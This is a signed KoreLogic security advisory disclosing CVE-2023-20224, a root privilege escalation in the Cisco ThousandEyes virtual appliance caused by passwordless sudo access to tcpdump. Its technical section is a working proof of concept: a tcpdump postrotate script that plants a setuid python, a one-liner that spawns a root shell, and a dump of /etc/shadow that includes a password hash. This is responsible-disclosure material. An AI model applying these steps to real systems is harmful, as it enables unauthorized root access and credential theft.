-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2023-002: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump

Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation via tcpdump
Advisory ID: KL-001-2023-002
Publication Date: 2023.08.17
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-002.txt


1. Vulnerability Details

     Affected Vendor: ThousandEyes
     Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
     Affected Version: thousandeyes-va-64-18.04 0.218
     Platform: Linux / Ubuntu 18.04
     CWE Classification: CWE-1395: Dependency on Vulnerable
                         Third-Party Component
     CVE ID: CVE-2023-20224


2. Vulnerability Description

     An insecure sudo configuration permits a low-privilege user
     to run arbitrary commands as root via the 'tcpdump' command
     without a password.


3. Technical Description

     The ThousandEyes Virtual Appliance is distributed with a
     restrictive set of commands that can be executed via sudo,
     without having to provide the password for the 'thousandeyes'
     account. However, the ability to execute tcpdump via sudo is
     permitted without requiring the password. The post-rotate
     functionality of tcpdump can be used to execute arbitrary
     commands on the virtual appliance, allowing a privilege
     escalation to root. This is a known privilege escalation
     path, but had not been disclosed for the ThousandEyes Virtual
     Appliance.

       $ ssh -c aes256-ctr -p 22 -i 1000eyes-id_rsa thousandeyes@1.3.3.7
       Welcome to ThousandEyes!
       Last login: Tue Jan  3 20:16:37 2023 from 1.3.3.8
       thousandeyes@thousandeyes-va:~$ id
       uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
       thousandeyes@thousandeyes-va:~$ sudo -l
       Matching Defaults entries for thousandeyes on thousandeyes-va:
           env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
     
       User thousandeyes may run the following commands on thousandeyes-va:
           (ALL : ALL) ALL
           (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
               te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
               te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
               /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
               te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
           (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump

     Here we see that tcpdump is available as root with no password,
     and no restrictions on the arguments it can be passed.

     Prepare a malicious script, then have tcpdump execute it as a
     postrotate command. Note, this needs to be more than simply
     a setuid copy of bash as it will drop privs if UID!=EUID, but
     python will not.

       thousandeyes@thousandeyes-va:~$ cat /tmp/x4
       COMMAND='cp /usr/bin/python3.6 /python3.6; chmod u+s /python3.6'
       TF=$(mktemp)
       echo "$COMMAND" > $TF
       chmod +x $TF
       sudo /usr/sbin/tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
     
       thousandeyes@thousandeyes-va:~$ cat /tmp/runme4
       /python3.6 -c 'import os; os.setuid(0); os.system("/bin/sh")'
     
       thousandeyes@thousandeyes-va:~$ /tmp/x4 
       dropped privs to root
       tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
     
     In another ssh session as the 'thousandeyes' user, execute
     'ping -c 1 127.0.0.1' to trigger tcpdump rotation:

       Maximum file limit reached: 1
       1 packet captured
       4 packets received by filter
       0 packets dropped by kernel

     Execute the setuid python which then launches a shell:
     
       thousandeyes@thousandeyes-va:/tmp$ /tmp/runme4 
       # id
       uid=0(root) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
     
       # bash   	
       root@thousandeyes-va:~# id
       uid=0(root) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
     
       root@thousandeyes-va:~# cat /etc/shadow
       root:!:19145:0:99999:7:::
       daemon:!*:18885:0:99999:7:::
       bin:!*:18885:0:99999:7:::
       sys:!*:18885:0:99999:7:::
       sync:!*:18885:0:99999:7:::
       games:!*:18885:0:99999:7:::
       man:!*:18885:0:99999:7:::
       lp:!*:18885:0:99999:7:::
       mail:!*:18885:0:99999:7:::
       news:!*:18885:0:99999:7:::
       uucp:!*:18885:0:99999:7:::
       proxy:!*:18885:0:99999:7:::
       www-data:!*:18885:0:99999:7:::
       backup:!*:18885:0:99999:7:::
       list:!*:18885:0:99999:7:::
       irc:!*:18885:0:99999:7:::
       gnats:!*:18885:0:99999:7:::
       nobody:*:18885:0:99999:7:::
       systemd-network:!*:18885:0:99999:7:::
       systemd-resolve:!*:18885:0:99999:7:::
       syslog:!*:18885:0:99999:7:::
       messagebus:!*:18885:0:99999:7:::
       _apt:!*:18885:0:99999:7:::
       thousandeyes:$6$qvB7Zfsh1fFCuBM9$l3X3Gj/7v.IY54N5YMFj5hpd.FbYOfqFPRcNxcOslO3M1MFfxcnUk1MNqtivetWIOTIfv.Z3ELQh5PPTUc2YL0:19146:7:364:30:::
       rdnssd:!*:19146:7:99999:30:::
       browserbot:!:19146::::::
       cntlm:!*:19146:7:99999:30:::
       sshd:!*:19146:7:99999:30:::
       root@thousandeyes-va:~#


4. Mitigation and Remediation Recommendation

     The vendor has released a version which remediates the described
     vulnerability. Release notes are available at:

     https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thoueye-privesc-NVhHGwb3


5. Credit

     This vulnerability was discovered by Jim Becher of
     KoreLogic, Inc.


6. Disclosure Timeline

     2023.04.26 - KoreLogic submits vulnerability details to Cisco.
     2023.04.26 - Cisco acknowledges receipt and the intention to
                  investigate.
     2023.05.04 - Cisco notifies KoreLogic that a remediation for this
                  vulnerability is expected to be available within
                  90 days.
     2023.06.30 - 45 business days have elapsed since KoreLogic reported
                  this vulnerability to the vendor.
     2023.07.11 - Cisco informs KoreLogic that the issue has been
                  remediated in the latest ThousandEyes Virtual
                  Appliance and a public advisory will be released
                  2023.08.16.
     2023.07.24 - 60 business days have elapsed since KoreLogic reported
                  this vulnerability to the vendor.
     2023.08.09 - Cisco provides KoreLogic with CVE-2023-20224 to
                  track this vulnerability.
     2023.08.16 - Cisco public acknowledgement.
     2023.08.17 - KoreLogic public disclosure.


7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2023
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmTedL8aHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkemq0A/+K2EmRCVv+9V1MHFqSpP+
BkTh6GM0GA1d8AW/5ybmV651v5AMmpJbHq+uyH+eTbJ2sk1L1hRExrBROQMplgJc
gB8YCwdUMk1TdN0SZN9BefYcgeYknadYqoTyHxD7PO50CC5cVerIX0LgZoLEfs4N
0rKnxkHAdEYtBC6NSgnquPRUz7WIF25+7gQTKQ+A3yIW8XwVKpeix/ZXDNGyxVIg
+rJR1YmDWpW81Qx+k0mw0aLF0cvEJVeqwofElG1iP0Y3iRz0b+hYfcFhlpDdWB59
3olx4R8N1mclu4iG9VYXZ5zxLwqp6cgAkgxvQry8jFsBkhkPnCFwP802oJGDhwEp
b/LJm2/MvMD2aDXhSqSMh7dumzdUhr//8hPKgPBavDUsAM1FgcE5NpcAYJyP6NpY
8TAOu2WeoZvwvczYsdUuoyvLPdTccT4c/48H8xP/IDl5WFZ9Ob+ooCM8cSf+oIs2
cYZAI9dxtRCRA2Lbqd4QBIXxx1KlQByk9Lde3IxZO+QobKVDvl/jLiXFY4DtUYyz
pQEvx7cvos1K+JB98KFqqVKi77F5CeZ1vIp2K+8f9wzOln98jgwFYChCOP9wIvLp
RKdFhB1SJy2wk4NE3gmLEXAgqtAvL5s7hA6frTxn0rUgh1HpBuZU0AhmrEiynO77
4P8V0JParFZos+nmgS3lmGg=
=0T7b
-----END PGP SIGNATURE-----